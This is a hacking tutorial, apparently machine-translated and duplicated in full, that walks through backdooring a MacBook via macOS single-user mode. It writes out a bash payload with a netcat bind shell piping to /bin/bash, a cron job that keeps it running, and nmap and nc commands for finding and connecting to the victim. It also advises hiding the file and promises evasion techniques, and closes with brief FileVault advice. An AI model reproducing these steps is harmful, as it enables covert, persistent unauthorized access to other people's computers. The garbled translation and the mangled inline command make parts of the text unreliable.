Holivars about which operating system is most secure - macOS or Windows are an eternal topic. Most people will say that macOS is more secure, but we'll show you how to create a backdoor on your MacBook in less than two minutes, and then just support the reverse shell with the tools already built into macOS.
Windows 10 is definitely not the benchmark for security, but in this article, we want to debunk the common myth that macOS is more secure.
To our surprise, macOS does not use FileVault hard drive encryption (although it may ask you to enable it during a clean install or upgrade of macOS) and does not use a firewall by default. Those who have enabled it usually turn it off in the end due to the fact that the speed of writing data to disk decreases, or because encryption loads the processor too much. On the other hand, the lack of hard disk encryption will allow attackers to gain full access to files on the MacBook without a password.
"Live on foot food" and maintain the autonomy of work
There are several payloads, rats, and backdoors that can be deployed against MacBook's. For the sake of simplicity, we will use a technique called "live on pasture", which encourages pentesters to use as many resources as there are on the compromised device during post-exploitation attacks. This means that you don't install additional payloads that are actively trying to avoid being seen by antivirus programs. Instead, you use apps that are already installed on the system, which will not be marked as malicious.
Netcat (called nc in the console) is a network utility that can be used to create TCP or UDP connections. Its list of features includes port scanning, file transfer, and port listening to create backdoors in operating systems and networks. Netcat is one of the tools already built into macOS that will be used during this attack.
Cron is a task scheduler that can be found on Unix-like operating systems such as Debian, Ubuntu, and macOS. Cron tasks are often used by system administrators to automate repetitive tasks, such as creating weekly backups or performing a specific task whenever the OS is rebooted. To ensure that the netcat backdoor is always available, a cron job is created that creates a new netcat listener each time it is closed.
This attack was tested on a MacBook Air using macOS version 10.13.4 with the latest Apple APFS file system.
Step 1. Enable Single-user mode
To launch this attack, single-user mode will be applied (one of the features of macOS). This mode was designed for troubleshooting, debugging boot errors, and troubleshooting disk issues, among many other administrative tasks. Unfortunately, this mode is very easy to get into, so it is constantly attacked by hackers.
To access single-user mode, turn on the target MacBook by holding down the Command + S buttons on your keyboard at the same time. Continue holding down both keys until white text appears on the screen.
In a few seconds, the hacker will have access to all the files on the MacBook and the root terminal - no passwords are required. That's all. However, if the target device does use FileVault encryption, then booting with Command + S will prompt you for a login password. If so, then this device is immune to this attack.
Step 2. Check Disk
While in a single-user terminal, first use fsck, a utility for checking macOS file systems for problems. This command is not used to compromise the device, but it should not be skipped. In our case, the fsck command was completed in less than 60 seconds when used on a 250 GB solid-state SSD.
Step 3: Mount the hard disk
The hard disk must be mounted with read and write permissions, which will allow attackers to transfer malicious files to the laptop. You can do this using the command below. With the ability to write data to disk, you can create a netcat backdoor.
Step 4: Creating the Netcat Payload
Reducing the vulnerability of compromised devices as they move between Wi-Fi networks in different parts of the world is beyond the scope of this article, so stay tuned. In the meantime, we'll show you how to connect to a MacBook with a backdoor installed on a shared Wi-Fi network.
For simplicity's sake, we'll save the constantly running script in the /etc/ directory and name the file payload. In real-world attack situations, it would make sense to hide the file in a less obvious directory with a less obvious name.
To create a payload file, you can use the Nano editor using the command below:
Enter the following BASH script in a terminal with nano open, then save the file and exit by pressing Ctrl + X, then Y, and then Enter. The script will have to be entered manually in single-user mode, so we tried to simplify it as much as possible. This script does several things, so we'll describe what it does for readers who aren't familiar with BASH.
The Netcat listener opens port 1234 on a macOS device. First line (n=$(ps aux | grep-o [1] 234)) creates a variable n that checks whether port 1234 is open. Open port detection is achieved by using the ps command, a tool used to view running background processes.
The next line (if [[ $n = "" ]]; then) is the beginning of an if statement that says that if variable n (port 1234) is not found, then mkfifo, the tool used to create a "named tunnel", will create a file named f. The file name here is completely arbitrary and the name "f"is used for simplicity.
The next mkfifo command is the netcat command (nc-l 0.0.0.0 1234 < f | / bin/bash-i > f 2< f | / bin/bash-i >>&1), which opens port 1234 on every available interface (0.0.0.0), and uses the f file to tunnel terminal commands to and from the backdoor device.
Step 5. Using Cron to execute the payload
We're done with the netcat script. Next, we will use crontab, the cron function, to schedule the execution of the BASH script (the payload file) every 60 seconds. To do this, use the command below:
A new terminal opens with nano. Enter this command in nano, then save and close nano:
If you need to use cron jobs with an interval other than 60 seconds, then read Ole Michelsen's article on using crontab in macOS (formerly Mac OS X).
Step 6: Upgrade your rights
The last step is to set the maximum rights to the payload file using the following chmod command:
Step 7: Shut down your Mac
When you're done, enter the command below in the console to turn off your laptop:
That's all about creating backdoors for macOS devices. When the owner of the laptop turns it on, the netcat listener will be executed every 60 seconds (if it has not already been started) and this will allow the hacker to access the device on the same Wi-Fi network.
Victims of this attack who do not scan open ports and background services for suspicious activity will not be able to detect this backdoor. In the following articles, we will show you how to improve this script and obfuscate its signature to avoid detection, so stay tuned.
Step 8. Connect to the Mac with the backdoor
From any computer on the network, you can use Nmap to find the IP address of a device on the router.
Operating system detection (the-O flag) requires at least one open and one closed port, so one or more random ports must be included in this command. In our example, netcat was configured to listen on port 1234, so the port number was included in this command. If there are multiple Apple devices on the network, then a MacBook with a backdoor will be the only device with port 1234 in the "open" state.
After determining the IP address of the device with the backdoor, connect to it using the netcat command. It is quite simple to do this:
Step 9. Fix the incorrect configuration
As mentioned earlier, when it comes to post-exploitation, it is better to "live on the grass" and use the programs and tools that you will find in the operating system to further compromise the target device to further compromise the target device.
After establishing a connection to the netcat listener, the shell will most likely be extremely primitive and, most likely, it will not know where programs are located in the OS. For example, using ifconfig to view interfaces will fail with the error "ifconfig: command not found".
To fix this use the below command source:
Using ifconfig now works as expected.
Step 10. Detecting a backdoor device
Now you can start viewing the software and hardware. An example of this would be using Apple's built-in system_profiler command to gather information for payloads and exploits. The uname command can also be used to view kernel version information.
Keep an eye out for future articles where we'll explain how to restore resilience to attacks from already compromised MacBooks as they move between Wi-Fi networks from anywhere in the world, how to obfuscate netcat to evade detection, and how to create and use advanced full-featured payloads.
How to protect yourself from attacks using single-user mode
If you don't want a hacker to do all this on your computer, the answer is simple: enable FileVault. Apple's full-fledged encryption helps prevent unauthorized access to information on hard drives and makes it harder to gain access to single-user mode.
You can enable FileVault by going to "System Preferences", then "Security and Privacy" and clicking on "Enable FileVault" (you may need to unlock the settings first). After completing this procedure, the MacBook will restart and require a password to unlock the computer every time you start the Mac. No account will be able to log in automatically, and you will also need a password to access single-user mode.
You should also not leave your computer unattended, especially in places where a hacker can gain physical access to it.
Disclaimer: This article is written for educational purposes only. The author or publisher did not publish this article for malicious purposes. If readers would like to use the information for personal gain, the author and publisher are not responsible for any harm or damage caused.
Pics helpugroup.ru
Windows 10 is definitely not the benchmark for security, but in this article, we want to debunk the common myth that macOS is more secure.
To our surprise, macOS does not use FileVault hard drive encryption (although it may ask you to enable it during a clean install or upgrade of macOS) and does not use a firewall by default. Those who have enabled it usually turn it off in the end due to the fact that the speed of writing data to disk decreases, or because encryption loads the processor too much. On the other hand, the lack of hard disk encryption will allow attackers to gain full access to files on the MacBook without a password.
"Live on foot food" and maintain the autonomy of work
There are several payloads, rats, and backdoors that can be deployed against MacBook's. For the sake of simplicity, we will use a technique called "live on pasture", which encourages pentesters to use as many resources as there are on the compromised device during post-exploitation attacks. This means that you don't install additional payloads that are actively trying to avoid being seen by antivirus programs. Instead, you use apps that are already installed on the system, which will not be marked as malicious.
Netcat (called nc in the console) is a network utility that can be used to create TCP or UDP connections. Its list of features includes port scanning, file transfer, and port listening to create backdoors in operating systems and networks. Netcat is one of the tools already built into macOS that will be used during this attack.
Cron is a task scheduler that can be found on Unix-like operating systems such as Debian, Ubuntu, and macOS. Cron tasks are often used by system administrators to automate repetitive tasks, such as creating weekly backups or performing a specific task whenever the OS is rebooted. To ensure that the netcat backdoor is always available, a cron job is created that creates a new netcat listener each time it is closed.
This attack was tested on a MacBook Air using macOS version 10.13.4 with the latest Apple APFS file system.
Step 1. Enable Single-user mode
To launch this attack, single-user mode will be applied (one of the features of macOS). This mode was designed for troubleshooting, debugging boot errors, and troubleshooting disk issues, among many other administrative tasks. Unfortunately, this mode is very easy to get into, so it is constantly attacked by hackers.
To access single-user mode, turn on the target MacBook by holding down the Command + S buttons on your keyboard at the same time. Continue holding down both keys until white text appears on the screen.
In a few seconds, the hacker will have access to all the files on the MacBook and the root terminal - no passwords are required. That's all. However, if the target device does use FileVault encryption, then booting with Command + S will prompt you for a login password. If so, then this device is immune to this attack.
Step 2. Check Disk
While in a single-user terminal, first use fsck, a utility for checking macOS file systems for problems. This command is not used to compromise the device, but it should not be skipped. In our case, the fsck command was completed in less than 60 seconds when used on a 250 GB solid-state SSD.
Code:
/sbin/fsck -fyStep 3: Mount the hard disk
The hard disk must be mounted with read and write permissions, which will allow attackers to transfer malicious files to the laptop. You can do this using the command below. With the ability to write data to disk, you can create a netcat backdoor.
Code:
/sbin/mount –uw /Step 4: Creating the Netcat Payload
Reducing the vulnerability of compromised devices as they move between Wi-Fi networks in different parts of the world is beyond the scope of this article, so stay tuned. In the meantime, we'll show you how to connect to a MacBook with a backdoor installed on a shared Wi-Fi network.
For simplicity's sake, we'll save the constantly running script in the /etc/ directory and name the file payload. In real-world attack situations, it would make sense to hide the file in a less obvious directory with a less obvious name.
To create a payload file, you can use the Nano editor using the command below:
Code:
nano /etc/payloadEnter the following BASH script in a terminal with nano open, then save the file and exit by pressing Ctrl + X, then Y, and then Enter. The script will have to be entered manually in single-user mode, so we tried to simplify it as much as possible. This script does several things, so we'll describe what it does for readers who aren't familiar with BASH.
Code:
#!/bin/bash
n=$(ps aux | grep -o [1]234)
if [[ $n = «» ]]; then
mkfifo f
nc -l 0.0.0.0 1234 < f | /bin/bash -i > f 2>&1
fiThe Netcat listener opens port 1234 on a macOS device. First line (n=$(ps aux | grep-o [1] 234)) creates a variable n that checks whether port 1234 is open. Open port detection is achieved by using the ps command, a tool used to view running background processes.
The next line (if [[ $n = "" ]]; then) is the beginning of an if statement that says that if variable n (port 1234) is not found, then mkfifo, the tool used to create a "named tunnel", will create a file named f. The file name here is completely arbitrary and the name "f"is used for simplicity.
The next mkfifo command is the netcat command (nc-l 0.0.0.0 1234 < f | / bin/bash-i > f 2< f | / bin/bash-i >>&1), which opens port 1234 on every available interface (0.0.0.0), and uses the f file to tunnel terminal commands to and from the backdoor device.
Step 5. Using Cron to execute the payload
We're done with the netcat script. Next, we will use crontab, the cron function, to schedule the execution of the BASH script (the payload file) every 60 seconds. To do this, use the command below:
Code:
env EDITOR=nano crontab -eA new terminal opens with nano. Enter this command in nano, then save and close nano:
Code:
* * * * * /etc/payloadIf you need to use cron jobs with an interval other than 60 seconds, then read Ole Michelsen's article on using crontab in macOS (formerly Mac OS X).
Step 6: Upgrade your rights
The last step is to set the maximum rights to the payload file using the following chmod command:
Code:
сhmod 777 /etc/payloadStep 7: Shut down your Mac
When you're done, enter the command below in the console to turn off your laptop:
Code:
shutdown -h nowThat's all about creating backdoors for macOS devices. When the owner of the laptop turns it on, the netcat listener will be executed every 60 seconds (if it has not already been started) and this will allow the hacker to access the device on the same Wi-Fi network.
Victims of this attack who do not scan open ports and background services for suspicious activity will not be able to detect this backdoor. In the following articles, we will show you how to improve this script and obfuscate its signature to avoid detection, so stay tuned.
Step 8. Connect to the Mac with the backdoor
From any computer on the network, you can use Nmap to find the IP address of a device on the router.
Code:
nmap -p1234,65534 -O 192.168.0.1/24Operating system detection (the-O flag) requires at least one open and one closed port, so one or more random ports must be included in this command. In our example, netcat was configured to listen on port 1234, so the port number was included in this command. If there are multiple Apple devices on the network, then a MacBook with a backdoor will be the only device with port 1234 in the "open" state.
After determining the IP address of the device with the backdoor, connect to it using the netcat command. It is quite simple to do this:
Code:
nc 192.168.0.65 1234Step 9. Fix the incorrect configuration
As mentioned earlier, when it comes to post-exploitation, it is better to "live on the grass" and use the programs and tools that you will find in the operating system to further compromise the target device to further compromise the target device.
After establishing a connection to the netcat listener, the shell will most likely be extremely primitive and, most likely, it will not know where programs are located in the OS. For example, using ifconfig to view interfaces will fail with the error "ifconfig: command not found".
To fix this use the below command source:
Code:
source /etc/profileUsing ifconfig now works as expected.
Step 10. Detecting a backdoor device
Now you can start viewing the software and hardware. An example of this would be using Apple's built-in system_profiler command to gather information for payloads and exploits. The uname command can also be used to view kernel version information.
Keep an eye out for future articles where we'll explain how to restore resilience to attacks from already compromised MacBooks as they move between Wi-Fi networks from anywhere in the world, how to obfuscate netcat to evade detection, and how to create and use advanced full-featured payloads.
How to protect yourself from attacks using single-user mode
If you don't want a hacker to do all this on your computer, the answer is simple: enable FileVault. Apple's full-fledged encryption helps prevent unauthorized access to information on hard drives and makes it harder to gain access to single-user mode.
You can enable FileVault by going to "System Preferences", then "Security and Privacy" and clicking on "Enable FileVault" (you may need to unlock the settings first). After completing this procedure, the MacBook will restart and require a password to unlock the computer every time you start the Mac. No account will be able to log in automatically, and you will also need a password to access single-user mode.
You should also not leave your computer unattended, especially in places where a hacker can gain physical access to it.
Disclaimer: This article is written for educational purposes only. The author or publisher did not publish this article for malicious purposes. If readers would like to use the information for personal gain, the author and publisher are not responsible for any harm or damage caused.
Pics helpugroup.ru
